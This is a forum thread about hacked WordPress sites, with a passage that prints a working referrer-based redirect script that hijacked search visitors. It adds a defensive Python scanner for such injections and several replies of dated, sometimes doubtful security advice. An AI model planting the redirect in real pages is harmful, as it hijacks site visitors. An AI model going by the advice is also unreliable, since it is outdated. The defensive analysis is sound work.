Do You Want To Join The Wordpress Hacked Club?

27 replies
Yes, I'm now a sad member of that group.

Two of my WP sites have been hacked recently. Both on the same server, both old WP installs so I think there must be some kind of security loophole that got exploited.

1) The first hack injected some eval(base64_decode('aWYoZnVuY3 ... code at the top of EVERY php file. I tried to decode it all but it also uses gzdecode and goes very deep into the WP install.

On the bright(?) side it looks like the injected code got broken so it "only" disabled my site rather than run its hack all the way through. My guess is it's probably some kind of redirect.

2) The second hack injected some script that is difficult to see within the WP php files. It's not in the higher level files like index.php so it's getting inserted at a lower level.

The only way I found out about it was my AVG detected an Exploit Search Engine Hijack when I navigated to the site and when I viewed the rendered source code I found this script:

<script>
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
  window.location="http://maxifind.net/index.php?pf_id=361&q="+r.substring(q+2+t.length).split("&")[0];
</script>

We can see on that last line that it's a maxifind.net redirect. Feel free to boycott their site. Grrr!

I scanned my own PC and it didn't turn up any viruses so I don't think I have that iframe virus that has been floating around lately. I think I just got careless by keeping old WP installs that have security holes.

So be sure to keep your WP installs up-to-date and also have a good Wordpress backup and restore process in place.

Wendell
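
An added example, not part of the original post and not WordPress code: a static scanner for the two symptoms described above, the eval(base64_decode(...)) prefix in PHP files and the referrer-sniffing redirect in rendered HTML, which also unwraps nested base64/gzip layers without executing them. The regexes, the names peel and scan, and the sample inputs (using example.invalid) are assumptions constructed for illustration.

```python
import base64
import gzip
import re
import zlib

# eval( [wrapper( ...] base64_decode('<literal>'  -- wrappers such as gzdecode( are optional
INJECTED = re.compile(
    rb"eval\s*\(\s*(?:\w+\s*\(\s*)*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]",
    re.I)
# document.referrer followed by an assignment to window.location in the same script
REDIRECT = re.compile(rb"document\.referrer.{0,2000}?window\.location\s*=", re.I | re.S)


def peel(blob, max_depth=20):
    """Statically unwrap nested base64/gzip layers. Nothing is executed."""
    layers = 0
    while layers < max_depth:
        m = INJECTED.search(blob)
        if not m:
            break
        try:
            blob = base64.b64decode(m.group(1))
        except ValueError:
            break  # truncated or damaged literal, keep what we have
        try:
            blob = zlib.decompress(blob, 47)  # 47 = accept gzip or zlib framing
        except zlib.error:
            pass  # this layer was base64 only
        layers += 1
    return layers, blob


def scan(name, data):
    """Return (kind, offset, layers, decoded) tuples for one file's bytes."""
    findings = []
    m = INJECTED.search(data)
    if name.endswith(".php") and m:
        findings.append(("php-eval-base64", m.start()) + peel(data))
    r = REDIRECT.search(data)
    if r:
        findings.append(("referrer-redirect", r.start(), 0, b""))
    return findings


# Constructed samples (not the code from the post): two nested layers, harmless payload
INNER = b"echo 'constructed payload';"
LAYER1 = b"eval(gzdecode(base64_decode('" + base64.b64encode(gzip.compress(INNER)) + b"')));"
SAMPLE_PHP = b"<?php eval(base64_decode('" + base64.b64encode(LAYER1) + b"')); ?>\n<?php /* original file */"
SAMPLE_HTML = (b"<script>var r=document.referrer;if(r.indexOf('google.')!=-1)"
               b"window.location='http://example.invalid/?q='+r;</script>")
```

Run scan over every file in a copy of the WordPress tree and over the HTML the site actually serves; a small offset in a PHP finding means the code sits at the top of the file, as in the first hack.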
  • Profile picture of the author VeitSchenk
    Wendell,

    how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

    Cheers

    Veit
    • Profile picture of the author WendellC
      Originally Posted by VeitSchenk View Post

      Wendell,

      how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

      Cheers

      Veit
      Ah, I'm embarrassed to say it but it was version 2.04! I think it was the first WP blog I ever created and I forgot to upgrade it over the years. Most of my blogs are now in the 2.6 - 2.7 range. I just have to go back and get them all upgraded to something with a few less security holes...

      Right now I'm trying to see if I can upgrade it without breaking the database. I tried to do an upgrade before on another WP site and it really screwed up the categories since WP at some point made some major changes to their schema.

      I might just end up installing 2.8, reposting all my content manually and taking my lumps with the permalink differences...

      *sigh*

      Wendell
    • Profile picture of the author danemorgan
      Originally Posted by VeitSchenk View Post

      Wendell,

      how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

      Cheers

      Veit
      2.7 is extremely vulnerable with several DOZEN published exploits.

      The thing is that zero day exploits really aren't that dangerous for folks like us that aren't national household names. But once these exploits are published there are forums out there very similar to this one, but with a different focus. People actually post exploits to help out the new script kiddies and sell them software to help them find and attack blogs just like yours.
  • Profile picture of the author VegasGreg
    I too had 5-6 WP sites hacked 2 weeks ago. They simply replaced my index page with their "you've been hacked" video. It said that they were Muslim Extremist Hackers.

    Some of the sites were brand new installs that I had not even finished yet and had not backed them up yet.
  • Profile picture of the author PixelPerfect
    If those guys are that clever why don't they hack the Wordpress.org site, would like to see that.
  • Profile picture of the author twright
    They make a security plugin for WP, might want to gander at some of those.

    Keep your eyes open, sometimes they do something simple so it appears like that's all they did.
    • Profile picture of the author kameleon
      I have a WordPress site, but didn't have such problems. Probably because I have only a few visitors monthly.
  • Profile picture of the author JohnnyPhunk
    Definitely gotta keep your WP up to date.

    There's a security scan plugin that helps too.
  • Profile picture of the author Lightlysalted
    I used to use WordPress. It is a very powerful piece of blogging software but after being hacked myself I went back to good old fashioned HTML and JavaScript. Also WordPress has a habit of running slow at peak times and my users were getting fed up of waiting 30 seconds for a page to load up. HTML is so fast because there is little code to slow the process down and it's the same with PHP.
  • Profile picture of the author GuerrillaIM
    I think a lot of WP blogs get hacked due to vulnerabilities in the plugins. Search for "plugin name + vulnerability" before installing to make sure it's not a real mess and easy to hack.
    • Profile picture of the author edd666666
      I would like to hitchhike on this issue, by asking for advice on how to upgrade. I am a novice on WordPress and don't know how to upgrade it. I have it hosted on Bluehost and can access the cPanel but after that I am stumped as to what to do. Can anyone offer me any advice on what to do after I am on the cPanel? Thanks,
      ed
      • Profile picture of the author JustaWizard
        Originally Posted by edd666666 View Post

        I would like to hitchhike on this issue, by asking for advice on how to upgrade. I am a novice on WordPress and don't know how to upgrade it. I have it hosted on Bluehost and can access the cPanel but after that I am stumped as to what to do. Can anyone offer me any advice on what to do after I am on the cPanel? Thanks,
        ed
        Ed, at Bluehost cpanel, click on the Wordpress Icon, then click on "my installs" and you can upgrade from there. Alternately, you can go to your wordpress dashboard for that site, and near the top there should be an "upgrade to 2.8" link.

        Best,
        David
        • Profile picture of the author JustaWizard
          The oldest version of WordPress I've ever used is 2.7.1 - but recently installing WP on a new site I installed 2.8 and had to delete the install because there was some kind of redirect to a link farm site. I suspect it was, ironically, a plugin named "redirect" because I deleted plugins one by one (at Bluehost's suggestion) until I isolated the offending plugin. Now I have 2.8 up and with all the plugins including "redirect" and things have been fine.

          I guess that plugins and Wordpress are just vulnerable???

          David
  • Profile picture of the author TheRichJerksNet
    Mine have not been hacked.. I run v2. something, not going to say the version but it sure is not 2.7 or 2.8..

    It's not the version that you run but the security you do on the site. You can NOT rely upon WordPress to secure your site.. You must take matters into your own hands and do it yourself...

    The past five years have seen the popularity of blogs grow in their use and as a means of making money. That's the meat that computer hackers look to sink their teeth into. A recent report by the Congressional Research Service stated that the financial impact of computer hackers amounts to $226 billion annually. Another report calculated that hackers could be taking up to six cents of every Internet dollar of revenue.

    Get used to it as it's life... Either that or secure your blog.. It is not always the plugins or the themes.

    James
    • Profile picture of the author JustaWizard
      Originally Posted by TheRichJerksNet View Post

      Mine have not been hacked.. I run v2. something, not going to say the version but it sure is not 2.7 or 2.8..

      It's not the version that you run but the security you do on the site. You can NOT rely upon WordPress to secure your site.. You must take matters into your own hands and do it yourself...

      The past five years have seen the popularity of blogs grow in their use and as a means of making money. That's the meat that computer hackers look to sink their teeth into. A recent report by the Congressional Research Service stated that the financial impact of computer hackers amounts to $226 billion annually. Another report calculated that hackers could be taking up to six cents of every Internet dollar of revenue.

      Get used to it as it's life... Either that or secure your blog.. It is not always the plugins or the themes.

      James
      Hi James, how does one secure a blog, then? - is that something done in cpanel on bluehost, or does one need to purchase/install 3rd party software or script onto a file via FTP?

      I admit I'm not green, but not a programmer-type either...

      THANKS!
      David
      • Profile picture of the author TheRichJerksNet
        Originally Posted by JustaWizard View Post

        Hi James, how does one secure a blog, then? - is that something done in cpanel on bluehost, or does one need to purchase/install 3rd party software or script onto a file via FTP?

        I admit I'm not green, but not a programmer-type either...

        THANKS!
        David
        Sent you a PM David...

        James
        • Profile picture of the author WendellC
          Well, I decided to bite the bullet and just start fresh with a brand new 2.8 install. Too much infestation to try and patch up the old installation.

          So...can anyone recommend a good WP plug-in that will help me to keep my future WP installs up to date?

          Thanks -

          Wendell
          • Profile picture of the author TheRichJerksNet
            Originally Posted by clickguy View Post

            Well, I decided to bite the bullet and just start fresh with a brand new 2.8 install. Too much infestation to try and patch up the old installation.

            So...can anyone recommend a good WP plug-in that will help me to keep my future WP installs up to date?

            Thanks -

            Wendell
            Yeah ... Do your own updates, do not use any plugins or auto updates - This includes the auto update that wordpress has. This is a huge security risk when you do.

            Also do NOT update as soon as a new release is out, wait until it is stable.

            James
  • Profile picture of the author valerieSONORA
    I think I was one of the very first members.
    • Profile picture of the author phantom76
      Once about 5 of my WP sites (which I wasn't updating for several months) were hacked by some Saudi Arabian hacker group. They defaced my front page and installed some malware which will get downloaded if you visit the page. Google started showing warnings on searches as "Reported attack site". I was horrified when I saw this. (Stupid of me, I didn't even visit these sites for months).

      They could hack because I wasn't updating my WP or the plugins. After this lesson, I religiously update all my WordPress installations and plugins as soon as a new update is available. Love the admin panel upgrade option available in the newer versions of WordPress.
  • Profile picture of the author Tom Dean
    I had a "seasonal" blog hacked. Didn't notice for months since I rarely checked it until it was getting close to the season. Fortunately they just altered the index page. They got in through an unprotected folder as in - it had no index file.

    Tom
  • Profile picture of the author MemberWing
    I second the suggestion of not updating as soon as WordPress releases the next major update.
    Wait a few weeks until the dust settles.
    I.e:
    *.*.Y - update is safe immediately.
    *.Y - wait 2 weeks before applying.
    Y.* - wait 4 weeks before applying.

    Gleb
  • Profile picture of the author azsno
    I have a plugin that works easily with WordPress, to Secure your BLOG...My WP-Padlock program secures WordPress easily and quickly, and comes with installation video, and info on how to secure the vulnerabilities in WordPress...

    You can find the plugin in my signature below...

    ~AzSno...

    P.S. If you're wondering about my credentials, I'm a former Network/Security Engineer in Silicon Valley. I'm certified with Cisco PIX, Checkpoint Firewalls, numerous IDS (Intrusion Detection Systems), and Nokia Firewalls and Security Devices...I've designed networks and security systems for eBay, Providian Financial Services, UC Berkeley, Lawrence Livermore Labs, and Cal State Hayward...Suffice it to say, I know a little about security...
    • Profile picture of the author classdancer
      Just had 10 WordPress blogs hacked.....
      Just come up with standard WP theme and say "HACKED BY ALI", all content gone.
      • Profile picture of the author MemberWing
        For all clients that I build sites for, I almost insist on including a full-blown, off-site, daily or weekly website backup, including all files and database.

        ...and of course on maintaining plugins and WordPress upgrades.

        Gleb
        • Profile picture of the author danemorgan
          Originally Posted by MemberWing View Post

          For all clients that I build sites for, I almost insist on including a full-blown, off-site, daily or weekly website backup, including all files and database.

          ...and of course on maintaining plugins and WordPress upgrades.

          Gleb
          That's all well and good, but really, by the time many hacks these days end up getting noticed your backups are compromised several months back.

          These days and these kinds of hacks it is less about street cred and more about cash money. Most of the time, now, if you notice you have been hacked, the hack failed.
  • Profile picture of the author danemorgan
    The reason Wordpress seems insecure is the same reason Windows seems insecure.

    Potential.

    If you are going to write a script to inject code into something are you going to spend your time trying to attack a 1,000 user base or a 1,000,000 user base? The work is the same, the payoff is dramatically different.

    A WordPress version is already being hacked at by hackers before most Wordpress users even know it exists.